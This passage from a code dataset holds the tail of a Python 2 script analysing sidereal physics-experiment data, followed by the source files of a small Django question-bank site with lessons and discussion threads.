viewRaw(self, figName=\"\", **kwargs):\n if kwargs.has_key('sigWindow'):\n cutAmpL=[self.cutAmp(**kwargs)]\n windowNames=['sig']\n else:\n windowNames, cutAmpL=zip(*[(key, self.cutAmp(sigWindow= win, 
**kwargs)) for key, win in self.windowD.items()])\n spf.view_raw(self.rawData(**kwargs), cutAmpL, self.trigTimes, cutAmpLNames=windowNames, figName=self.timestamp+'- '+figName) \n\n def viewSeq(self, figName=\"\", sharexAx=None, bPlotStChi2Comp=True, **kwargs):\n if kwargs.has_key('sigWindow'):# and isinstance(kwargs['sigWindow'], basestring):\n figName +='- ({})'.format(kwargs['sigWindow'])\n correlationSigComp=None\n if bPlotStChi2Comp is not None:\n d=copy(kwargs); d['stPtChi2Lim']=inf;\n correlationSigComp=self.sequenceAmp(**d)\n spf.view_correlations(self.pointAmp(**kwargs), self.sequenceAmp(**kwargs), self.timestamp+'- '+figName, sharexAx=sharexAx, correlationSigComp=correlationSigComp.sig)\n\n def viewSid(self, **kwargs):\n #spf.view_sidereal(self.sequenceAmp(**kwargs), self.sidAmp(**kwargs))\n sidAmp=self.sidAmp(**kwargs)\n seqAmp=self.sequenceAmp(**kwargs)\n labAmp=self.labAmp(**kwargs)\n spf.view_sidereal(seqAmp, sidAmp, labAmp)\n\n def viewCorrelationFilt(self, **kwargs):\n D=copy(kwargs)\n D.update(dict(sensNameL=[], stPtChi2Lim=inf))\n pointAmpBase=self.pointAmp(**D)\n seqAmpBase=self.sequenceAmp(**D)\n\n pointAmpFilt=self.pointAmp(**kwargs)\n seqAmpFilt=self.sequenceAmp(**kwargs)\n spf.view_correlation_filtering(pointAmpBase, seqAmpBase,\n pointAmpFilt, seqAmpFilt)\n\n def edit_set_info(self):\n MT.open_file_external(os.path.join(self.base_dir, 'set_info.yaml'))\n @memoize_inst_meth\n def test_div(self, **kwargs):\n kwargs, kept_args=divide_args(kwargs, self.pointAmp)\n return kwargs, kept_args\n\n def checkDirections(self, bPlot=False, **kwargs):\n \"\"\"Check that the calculated apparatus directions fit with the available data\n \n To do this we'll check the North position sensor, the motor trigger-log, and the Z-axis flux-gate, if available\n \"\"\"\n #Flux-gates\n expTh, expSig = [0, pi/2], [ 0.018, -0.045]\n if self.set_info.has_key('bFieldZeroed') and self.set_info['bFieldZeroed'] is False:\n expTh, expSig = [0, pi/2], [ 0.02, -0.08]\n zCor=self.sequenceAmp(rawData='med:Fluxgate Z', **kwargs)\n actSig=zCor.sig[:,0,:]\n actTh=zCor.theta[:,0,:]\n expRot=array([MT.rotate_quadrature_sample(expTh, expSig, cov=None, rotateTo=-th[0])[1] for th in actTh])\n I=~isnan(actSig)\n gSig=actSig[I]\n gExp=expRot[I]\n\n bProblem=False\n if any(abs(gExp-gSig)>0.01):\n vprint(\"Fluxgate Z show's problems! (timestamp: {0})\".format(self.timestamp))\n bProblem=True\n\n if bProblem or bPlot:\n figure(self.timestamp+'- direction check')\n gT=zCor.t[:,0,:][I]\n plot(gT, gSig, '.', label='Measured')\n plot(gT, gExp,'.', label='Expected')\n plot(gT, gExp-gSig,'.', label='difference')\n xlabel('Sid. 
Days')\n ylabel('V')\n legend(fontsize=10)\n\n\n # North-positon sensor\n try:\n if self.rawData().t[0] < 5200: #(Or whenever the sidereal day the sensor was actually switched?)\n\n npsDat=self.rawData(rawData='med:North Position Sensor') #(or whatever it actually was)\n else:\n npsDat=self.rawData(rawData='motor:North Position Sensor') #(or whatever it actually was)\n except (OSError, ValueError):\n npsDat=None\n\n if npsDat is not None:\n tNorthSens=npsDat.t[npsDat.sig<4]\n\n ang=(self.apparatusAngles()-pi)%(2*pi) + pi #Move everything to the range (-pi, +pi)\n tRot=self.trigTimes()\n tBound=c_[tRot[:-1], tRot[:-1]+self.rSpec.interval].ravel()\n angBound=c_[ang[:-1], ang[1:]].ravel()\n\n apAngleIntp=interp(npsDat.t, tBound, angBound) #Interpolate to the same times as the north-sensor is had\n\n figure('Check North-position sensor:')\n plot(npsDat.t, apAngleIntp)\n plot(npsDat.t, npsDat.sig)\n else:\n vprint(\"No north-position sensor data for checking\")\n \n \n # Motor trigger-log\n\n return\n#------------------------------------------------------------------------------\n\n## Processing functions\ndef genSeqFiltPol(sgn): \n def genSeqFilt(ds, seqAmp):\n ts=seqAmp.t[:,0,0]\n calArr=ds.calArr\n cal=MT.const_interp(ts, calArr.t, calArr.val)\n seqAmp.sig[sign(cal)!=sgn]*=nan\n return seqAmp\n return genSeqFilt\n\n\ndef seqFiltFuncAxisInterleave(axisAngle, Ndiv):\n def filt(seqAmp):\n return seqFiltFuncInterleave(Ndiv)((seqFiltFuncAxis(sgn)(seqAmp)))\n return filt\n#genSeqFiltPol(1)(seqAmp)\n\ndef seqFiltFuncAxis(axisAngle):\n def filt(seqAmp):\n mask= (nearby_angles(seqAmp.theta[:,0,0], axisAngle, 0.1) |\n nearby_angles(seqAmp.theta[:,0,0], axisAngle+pi,0.1) \n )\n return CorrelationData(*[s[mask] for s in seqAmp])\n return filt\n\ndef seqFiltFunc2Axes(axisAngle):\n def filt(seqAmp):\n mask= (nearby_angles(seqAmp.theta[:,0,0], axisAngle, 0.1) | \n nearby_angles(seqAmp.theta[:,0,0], axisAngle+pi,0.1) |\n nearby_angles(seqAmp.theta[:,0,0], axisAngle+pi/2,0.1) |\n nearby_angles(seqAmp.theta[:,0,0], axisAngle+3*pi/2,0.1) \n )\n return CorrelationData(*[s[mask] for s in seqAmp])\n return filt\ndef seqFiltFuncAngle(angle):\n def filt(seqAmp):\n mask= nearby_angles(seqAmp.theta[:,0,0], angle, 0.1)\n return CorrelationData(*[s[mask] for s in seqAmp])\n return filt\n\ndef seqFiltFuncSlc(slc):\n def filt(seqAmp):\n return CorrelationData(*[s[slc] for s in seqAmp])\n return filt\n\n\ndef seqFiltFuncInterleave(Ndiv):\n #slcL=[slice(k,None, Ndiv) for k in range(Ndiv)]\n def filt(seqAmp):\n Npts=seqAmp.t.shape[0]\n if Npts < 5*Ndiv:\n N = int(seqAmp.t.shape[0]/5)\n else:\n N=Ndiv\n Npts=floor(Npts/Ndiv)*Ndiv\n return [CorrelationData(*[s[k-Npts::N] for s in seqAmp]) for k in range(N)]\n return filt\n\ndef seqFiltFuncInterleaveGenerator(otherFiltF, Ndiv=10):\n #slcL=[slice(k,None, Ndiv) for k in range(Ndiv)]\n def filt(seqAmp, k):\n Npts=seqAmp.t.shape[0]\n if Npts < 5*Ndiv:\n N = int(seqAmp.t.shape[0]/5)\n else:\n N=Ndiv\n Npts=floor(Npts/Ndiv)*Ndiv\n if k>=N:\n return None\n return otherFiltF(CorrelationData(*[s[k-Npts::N] for s in seqAmp]))\n\n for k in range(Ndiv):\n #f=partial(filt, k=N)\n yield partial(filt, k=k)\n\ndef seqFiltFuncTime(Tdiv=1): #Divid it up into small chunks of time and process each\n def filt(seqAmp):\n totalTime=seqAmp.t[-1,0,0]-seqAmp.t[0,0,0]\n t0=seqAmp.t[0,0,0]\n N=floor(totalTime/Tdiv)\n startTimes=arange(N)*Tdiv + t0\n indxL=sliceSorted(seqAmp.t[:,0,0], startTimes, delta_t=Tdiv)\n return [CorrelationData(*[s[indx] for s in seqAmp]) for indx in indxL]\n return filt\n\ndef 
checkDSUnc(ds, Ndiv=10, **kwargs):\n #Process every Nth sequence:\n #fL=[seqFiltFuncSlc(slice(k,None, Ndiv)) for k in range(Ndiv)]\n #sidAmpL=[ds.sidAmp(filtF=f) for f in fL]\n sidAmpL=ds.sidAmp(seqFiltFuncInterleave(Ndiv), **kwargs)\n #sidAmpL=ds.sidAmp(filtF=seqFiltFuncTime(Tdiv=0.3))\n #wtMn, calcedUnc, apparentUnc, wtErr= spf.combine_angle_amps(sidAmpL, plot=True)\n combinedSid= spf.combine_angle_amps(sidAmpL, plot=True)\n\n #Probably don't need to rotate in this case, but just in case\n\n sidAmpFull=ds.sidAmp(**kwargs)\n print(\"Number of sets: {0}\".format(len(sidAmpL)))\n pprint(combinedSid)\n pprint(sidAmpFull)\n #print(\"Subset deviation: {}, combined Mean:{}\\n, combined unc (trust/don't trust): {}, {},\\n full mean:{}, full uncert {}\".format(wtErr, wtMn,\n #calcedUnc, apparentUnc, \n #sidAmpFull.sig, sqrt(sidAmpFull.err.diagonal())) )\n\n show()\n\ndef testDS(rSpec=None, rotFact=1, **kwargs):\n defaultD=dict(amp=0.05, sigma=2, amp2=0.00, \n N=10000000, phi=0*pi, \n zeroingTime=30, fracDev=0.00, \n sizeDev=50.0, startTime=0)\n defaultD.update(kwargs)\n rsBase=RotationSpec(startingAngle=0, delay=9, interval=10, numRotations=20, rotAngles=[rotFact*180], extraRotAngle=rotFact*90)\n rSpec= rSpec if rSpec is not None else rsBase\n sd,sig=makeTestData(\n rSpec, **defaultD)\n ds=SPDataSet('test', preloadDict={'fastD': [sd, sig, 'sig']}, rSpec=rSpec, windowD={'sig': Window(5, -6)} )\n return ds\n\ndef testDS2(rSpec=None, rotDir=1, **kwargs):\n defaultD=dict(amp=0.5, sigma=1.0, amp2=0.0, \n N=1000000, phi=0.25*pi, \n zeroingTime=30, fracDev=0.00, \n sizeDev=00.0, startTime=0)\n defaultD.update(kwargs)\n rsBase=RotationSpec(startingAngle=0, delay=9, interval=10, numRotations=8, rotAngles=[rotDir*90], extraRotAngle=rotDir*45)\n rSpec= rSpec if rSpec is not None else rsBase\n sd,sig=makeTestData(\n rSpec, **defaultD)\n ds=SPDataSet('test', preloadDict={'fastD': [sd, sig, 'sig']}, rSpec=rSpec, windowD={'sig': Window(5, -6)} )\n return ds\n\nif __name__==\"__main__\":\n d=dict(sigWindow=Window(4,-5))\n if 0:\n sidAmpL=[]\n if 0: # Check theoretical\n rsBase=RotationSpec(startingAngle=0, delay=9, interval=10, numRotations=20, rotAngles=[-180], extraRotAngle=-90)\n rsL=[rsBase._replace(startingAngle=th) for th in hstack([zeros(15), -ones(0)*90, ones(0)*45])]\n for rs, startTime in zip(rsL, 0.2*arange(len(rsL))):\n sd,sig=makeTestData(\n rs, amp=1.00, sigma=2, N=400000, phi=0*pi, zeroingTime=30, fracDev=0.05, sizeDev=50.0, startTime=startTime*1)\n\n ds=SPDataSet('test', preloadDict={'fastD': [sd, sig, 'sig']}, rSpec=rs )\n sAmp=ds.sidAmp(sigWindow=Window(4,-5))\n vprint(sAmp)\n sidAmpL.append(sAmp)\n elif 0: #Check slicing\n ds=testDS()\n checkDSUnc(ds, 30)\n #sAmp=ds.sidAmp(sigWindow=Window(4,-5))\n #vprint sAmp\n\n \n #EW-NS\n #sidAmpAngsL=[ds.sidAmp(sigWindow=Window(4,-5), filtF=seqFiltFuncAxis(ang)) for ang in (0, pi/2)]\n #sidAmpL=sidAmpSlcsL\n\n\n \n\n\n\n else: #Check actual data\n timestampL=[\n #'5209.26',\n #'5240.33',\n '5249.72',\n '5273.74',\n '5282.23',\n '5292.71',\n '5294.31',\n #'5296.33',\n '5310.41',\n '5318.41',\n '5348.82',\n '5369.87',\n '5386.02',\n '5390.74',\n ]\n for ts in timestampL:\n #try:\n ds=SPDataSet(ts)#, preloadDict={'fastD': [sd, sig, 'sig']}, rSpec=rSpec )\n ds.checkDirections()\n show()\n sAmp=ds.sidAmp()\n vprint(sAmp)\n sidAmpL.append(sAmp)\n #except Exception as (errno, strerror):\n # vprint \"Exception({0}): {1}\".format(errno, strerror)\n # vprint(\"For timestamp: {0}\".format(ts))\n #pass; #Print the error and say which set it was, but keep going.\n \n 
ts = [ sAmp.t for sAmp in sidAmpL]\n (ths, ys, covs)= zip(*[ rotate_quadrature_sample(sAmp.labTheta, sAmp.sig, sAmp.err) for sAmp in sidAmpL])\n #ys, covs= [ ]\n\n ys=array(ys)\n errs=array([sqrt(cov.diagonal()) for cov in covs])\n ts=array(ts)\n #errs=[diag(cov) for cov in covs]\n figure()\n for t, y, e in zip(ts.T, ys.T, errs.T):\n errorbar( t, y, e, fmt='.') #Probaby not quite right\n\n mn, wEr, unc= weightedStats(ys, 1./errs**2, axis=0)\n vprint(\"Subset deviation: {0}, (average errorbar):{1},\\nmean: {2},, (from subsets): {3}, final uncert: (full){4}\".format(er, errs.mean(axis=0), mn, unc, None) )\n show()\n\n \n \n #seqAxNSFilt= seqFiltFuncAxis(0);\n #seqAxEWFilt= seqFiltFuncAxis(pi/2);\n if 0: #Do idiot checks on experiment data\n timestampL=[\n #'5310.41',\n '5318.42',\n #'5348.82',\n #'5369.87',\n #'5386.02',\n #'5390.74',\n #'5393.04',\n ]\n \n for ts in timestampL:\n ds=SPDataSet(ts)\n ds.checkDirections(bPlot=True)\n show()\n ds.edit_set_info()\n raw_input('enter to continue')\n #ds.checkDirections(**d)\n #SPDataSet('5386.02').checkDirections(**d)\n #SPDataSet('5310.41').checkDirections(**d)\n #SPDataSet('5348.82').checkDirections(**d)\n #SPDataSet('5369.87').checkDirections(**d)\n if 0:\n for ts in loadSPFiles.getAllTimeStamps():\n if float(ts)>5310:\n ds=SPDataSet(ts)\n if ds.set_info['bUseful']=='unknown' or 1:\n st=''\n while st!='c':\n vprint(\"Current timestamp is: {0}\".format(ts))\n ds.edit_set_info()\n #ds.viewRaw()\n ds.viewSeq()\n ds.viewSeq(rawData='rel:Tilt Sensor 1')\n ds.checkDirections()\n #ds.viewSeq()\n #try:\n # ds.checkDirections()\n #except Exception as ex:\n # vprint (\"Exception occured: {0}\".format(ex))\n show()\n st=raw_input('Enter for again, c+enter to continue to next')\n\n" } ]
44
herougo/QuestionBank
https://github.com/herougo/QuestionBank
43a1be58349064060847a425a263713acac16ad5
70f145a2d939f57fc2d0d4251c8ed14557329fed
0f02479063a1964892d6bd697e5194c51436d326
refs/heads/master
2021-01-25T07:27:44.379957
2014-12-19T17:37:00
2014-12-19T17:37:00
28,192,056
1
3
null
2014-12-18T16:43:11
2014-12-18T16:43:11
2014-12-19T17:35:03
null
[ { "alpha_fraction": 0.6487804651260376, "alphanum_fraction": 0.6585366129875183, "avg_line_length": 28.428571701049805, "blob_id": "2ee4af909695c9199f45a32d534bf76a6c0cce25", "content_id": "a553d1074b5660ba8fe1c91cecac09fb1b91c463", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 84, "num_lines": 7, "path": "/lessons/urls.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom lessons import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^(?P<lesson_id>[0-9]+)/$', views.lesson_template, name='lesson_template'),\n]" }, { "alpha_fraction": 0.653333306312561, "alphanum_fraction": 0.653333306312561, "avg_line_length": 17.75, "blob_id": "102b8250fe8bf06a08cb472305c437a9c8944e23", "content_id": "11adff2f9998359bdc112857db0a95a5e3f04de7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 75, "license_type": "no_license", "max_line_length": 38, "num_lines": 4, "path": "/questions/static/js/main.js", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "$(document).ready(function() {\n // Add document functionality here\n\n});\n" }, { "alpha_fraction": 0.7441016435623169, "alphanum_fraction": 0.7441016435623169, "avg_line_length": 35.79999923706055, "blob_id": "8b6fcef2384511375408993db7565c41fa726335", "content_id": "85f43a579d06a2c360e85523927226af528d3821", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 551, "license_type": "no_license", "max_line_length": 71, "num_lines": 15, "path": "/discussions/views.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom discussions.models import Thread, Comment\n\n\ndef index(request):\n all_discussions = Thread.objects.all()\n context = {'discussion_list': all_discussions}\n return render(request, 'discussions/index.html', context)\n\n\ndef thread_template(request, discussion_id):\n comments = Comment.objects.filter(thread=discussion_id)\n title = Thread.objects.get(id=discussion_id).title\n context = {'comment_list': comments, 'title': title}\n return render(request, 'discussions/thread_template.html', context)" }, { "alpha_fraction": 0.8201438784599304, "alphanum_fraction": 0.8201438784599304, "avg_line_length": 34, "blob_id": "7a4ac5740cf4a5df7a598b81b814ce516fe9a0ff", "content_id": "4b43cfbd9a61033928cef7cebb4909f7187e8209", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 55, "num_lines": 4, "path": "/questions/admin.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom questions.models import Question, Solution, Source\n\nadmin.site.register([Question, Solution, Source])" }, { "alpha_fraction": 0.5972073078155518, "alphanum_fraction": 0.6063372492790222, "avg_line_length": 26.397058486938477, "blob_id": "f971d18568b861cfe0b619d0a1c86b9b30e9d443", "content_id": "23f106422af4228ab7cd6c0f758e69c5a570ea3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1862, "license_type": "no_license", "max_line_length": 117, "num_lines": 68, "path": "/questions/models.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from 
django.db import models\nfrom django.contrib.auth.models import User\nfrom discussions.models import Thread\n\n\nclass Solution(models.Model):\n solution_text = models.TextField()\n\n def __str__(self):\n return self.solution_text[:50]\n\n\nclass Source(models.Model):\n source_name = models.CharField(max_length=64)\n source_url = models.CharField(max_length=256)\n\n def __str__(self):\n return self.source_name\n\n\nclass Question(models.Model):\n MATH = \"MATH\"\n PMATH = \"PMATH\"\n CS = \"CS\"\n CO = \"CO\"\n STAT = \"STAT\"\n ACTSCI = \"ACTSCI\"\n AMATH = \"AMATH\"\n\n SUBJECTS = (\n (MATH, \"Mathematics\"),\n (PMATH, \"Pure Mathematics\"),\n (CS, \"Computer Science\"),\n (CO, \"Combinatorics and Optimization\"),\n (STAT, \"Statistics\"),\n (ACTSCI, \"Actuarial Science\"),\n (AMATH, \"Applied Mathematics\"),\n )\n\n E = \"E\"\n M = \"M\"\n H = \"H\"\n\n DIFFICULTY = (\n (E, \"Easy\"),\n (M, \"Medium\"),\n (H, \"Hard\"),\n )\n\n question_title = models.CharField(max_length=64)\n question_text = models.TextField()\n\n subject = models.CharField(max_length=5, choices=SUBJECTS, default=MATH)\n difficulty = models.CharField(max_length=1, choices=DIFFICULTY, default=M)\n\n solution = models.ForeignKey(Solution, blank=True, null=True)\n # lesson = models.ForeignKey(Lesson, blank=True, null=True)\n source = models.ForeignKey(Source, blank=True, null=True)\n # discussion = models.ForeignKey(Thread, editable=False)\n\n def __str__(self):\n return \"{0} - {1}: {2}\".format(self.difficulty, self.subject,\n self.question_title[:50])\n\n def save(self):\n if not self.id:\n self.discussion = Thread.objects.create_thread(User.objects.get(id=1), self.question_title, self.subject)\n super(Question, self).save()" }, { "alpha_fraction": 0.5670911073684692, "alphanum_fraction": 0.5719882249832153, "avg_line_length": 34.2068977355957, "blob_id": "32d1d4bc21f09f4ad78981c094e31d33d2a30b8f", "content_id": "b95081592d745c033cdf1f6d802027419a8bab8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1021, "license_type": "no_license", "max_line_length": 116, "num_lines": 29, "path": "/discussions/migrations/0002_comment.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "# encoding: utf8\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('discussions', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comment',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('comment_text', models.TextField()),\n ('creator', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field=u'id')),\n ('thread', models.ForeignKey(to='discussions.Thread', to_field=u'id')),\n ('upvotes', models.PositiveSmallIntegerField()),\n ('downvotes', models.PositiveSmallIntegerField()),\n ('date', models.DateTimeField(editable=False)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.5198618173599243, "alphanum_fraction": 0.5250431895256042, "avg_line_length": 25.31818199157715, "blob_id": "83e44deceb8cfcb2cfa5f32dfa364d06c7f4a48f", "content_id": "02f9baaf1076a602cb8f730e47ca151b9af4a98c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 579, "license_type": "no_license", "max_line_length": 116, "num_lines": 22, "path": 
"/lessons/migrations/0001_initial.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "# encoding: utf8\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Lesson',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('lesson_name', models.CharField(default='', max_length=64)),\n ('lesson_text', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.6619718074798584, "alphanum_fraction": 0.67136150598526, "avg_line_length": 29.571428298950195, "blob_id": "fff3b1bd20f99d24db539bf7751a4b7ab95580ab", "content_id": "449bcb4157d9c54165d6cf179cebd8da2212e8f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "no_license", "max_line_length": 90, "num_lines": 7, "path": "/questions/urls.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom questions import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^(?P<question_id>[0-9]+)/$', views.question_template, name='question_template'),\n]" }, { "alpha_fraction": 0.5260804891586304, "alphanum_fraction": 0.5310481786727905, "avg_line_length": 41.82978820800781, "blob_id": "fafd34b7d3bfb49d86e090bd3afff45d12ec8d69", "content_id": "767ba8a9c130506b98883f653052c0611394a6a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2013, "license_type": "no_license", "max_line_length": 303, "num_lines": 47, "path": "/questions/migrations/0001_initial.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "# encoding: utf8\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Solution',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('solution_text', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Source',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('source_name', models.CharField(max_length=64)),\n ('source_url', models.CharField(max_length=256)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Question',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('question_title', models.CharField(max_length=64)),\n ('question_text', models.TextField()),\n ('subject', models.CharField(default='MATH', max_length=5, choices=[('MATH', 'Mathematics'), ('PMATH', 'Pure Mathematics'), ('CS', 'Computer Science'), ('CO', 'Combinatorics and Optimization'), ('STAT', 'Statistics'), ('ACTSCI', 'Actuarial Science'), ('AMATH', 'Applied Mathematics')])),\n ('difficulty', models.CharField(default='M', max_length=1, choices=[('E', 'Easy'), ('M', 'Medium'), ('H', 'Hard')])),\n ('solution', models.ForeignKey(to_field=u'id', blank=True, to='questions.Solution', null=True)),\n ('source', models.ForeignKey(to_field=u'id', blank=True, to='questions.Source', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.6461318135261536, "alphanum_fraction": 
0.6461318135261536, "avg_line_length": 29.39130401611328, "blob_id": "67f1e0becfcd684680c7ee78b2706e646c4d8126", "content_id": "992725aa208bdc681fb953acfe0b6a542a04ba70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 698, "license_type": "no_license", "max_line_length": 104, "num_lines": 23, "path": "/question_bank/urls.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.conf import settings\n\n\ndef home(request):\n from django.shortcuts import render\n return render(request, 'index.html', {})\n\nurlpatterns = patterns(\n '',\n url(r'^$', home, name='home'),\n url(r'^home/', home, name='home'),\n url(r'^questions/', include('questions.urls')),\n url(r'^discussions/', include('discussions.urls')),\n url(r'^lessons/', include('lessons.urls')),\n url(r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^static/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n )" }, { "alpha_fraction": 0.6619718074798584, "alphanum_fraction": 0.67136150598526, "avg_line_length": 29.571428298950195, "blob_id": "376d4ea395df25a9f90bc0920a36095c5b601034", "content_id": "5ae014109153c666934454a4a41973ccfd56c61d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "no_license", "max_line_length": 88, "num_lines": 7, "path": "/discussions/urls.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom discussions import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^(?P<discussion_id>[0-9]+)/$', views.thread_template, name='thread_template'),\n]" }, { "alpha_fraction": 0.6199365854263306, "alphanum_fraction": 0.6248679161071777, "avg_line_length": 31.272727966308594, "blob_id": "030f5939d96b1528ffa91f28b8a31e1ccb3315a0", "content_id": "c6aed0086705c70e29e5787074fd0e2e74426230", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2839, "license_type": "no_license", "max_line_length": 81, "num_lines": 88, "path": "/discussions/models.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom django.db import models\nfrom django import forms\nfrom django.contrib.auth.models import User\n\n\nclass ThreadForm(forms.Form):\n # Attach to view for users to create a thread\n def __init__(self, request):\n from questions.models import Question\n self.fields = (\n forms.CharField(field_name=\"Title\", maxlength=128, is_required=True),\n forms.ChoiceField(field_name=\"Subject\", choices=Question.SUBJECTS)\n )\n self.request = request\n\n def save(self, new_data):\n return Thread.objects.create_thread(\n self.request.user, new_data['Title'], new_data['Subject'])\n\n\nclass ThreadManager(models.Manager):\n def create_thread(self, user, title, subject=None):\n new_thread = self.model(title=title, creator=user,\n upvotes=0, downvotes=0, date=datetime.today())\n new_thread.save()\n return new_thread\n\n\nclass Thread(models.Model):\n creator = models.ForeignKey(User)\n title = models.CharField(max_length=128)\n upvotes = models.PositiveSmallIntegerField()\n downvotes = models.PositiveSmallIntegerField()\n date = models.DateTimeField(editable=False)\n\n objects = ThreadManager()\n\n def __str__(self):\n 
return self.title + \" (\" + str(self.creator) + \")\"\n\n def save(self):\n if not self.id:\n self.date = datetime.today()\n super(Thread, self).save()\n\n\nclass CommentForm(forms.Form):\n # Attach to view for users to comment\n def __init__(self, request):\n self.fields = (\n forms.TextField(field_name=\"Comment\"),\n forms.ModelChoiceField(field_name=\"Thread\",\n queryset=Thread.objects.all()),\n )\n self.request = request\n\n def save(self, new_data):\n return Comment.objects.create_comment(\n self.request.user, new_data['Comment'], new_data['Thread'])\n\n\nclass CommentManager(models.Manager):\n def create_comment(self, user, comment_text, thread):\n new_comment = self.model(comment_text=comment_text, creator=user,\n thread=thread, upvotes=0, downvotes=0,\n date=datetime.today())\n new_comment.save()\n return new_comment\n\n\nclass Comment(models.Model):\n comment_text = models.TextField()\n creator = models.ForeignKey(User)\n thread = models.ForeignKey(Thread)\n upvotes = models.PositiveSmallIntegerField()\n downvotes = models.PositiveSmallIntegerField()\n date = models.DateTimeField(editable=False)\n\n objects = CommentManager()\n\n def __str__(self):\n return self.creator.username[:20] + \": \" + self.comment_text[:40]\n\n def save(self):\n if not self.id:\n self.date = datetime.today()\n super(Comment, self).save()" }, { "alpha_fraction": 0.5639344453811646, "alphanum_fraction": 0.5792349576950073, "avg_line_length": 27.59375, "blob_id": "9f4114390f53bbcceac5fff7bee183a5a4085f02", "content_id": "8793a7392b3f01b2c8ec4541d5065db58bfa89c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 915, "license_type": "no_license", "max_line_length": 115, "num_lines": 32, "path": "/lessons/migrations/0002_auto_20141126_0140.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "# encoding: utf8\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport datetime\nfrom django.contrib.auth.models import User\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lessons', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='lesson',\n old_name='lesson_name',\n new_name='title',\n ),\n # migrations.AddField(\n # model_name='lesson',\n # name='creator',\n # field=models.ForeignKey(to=settings.AUTH_USER_MODEL, default=User.objects.get(id=1), to_field=u'id'),\n # preserve_default=False,\n # ),\n migrations.AddField(\n model_name='lesson',\n name='date',\n field=models.DateTimeField(default=datetime.date(2014, 11, 26), editable=False),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.6202898621559143, "alphanum_fraction": 0.626086950302124, "avg_line_length": 27.79166603088379, "blob_id": "a50def7dbb2a6b6213c3e672bae49ae1a2d10526", "content_id": "66756e21cc29f478222e73cb8405f396fef34bea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 690, "license_type": "no_license", "max_line_length": 76, "num_lines": 24, "path": "/lessons/models.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom django.db import models\n\n\nclass 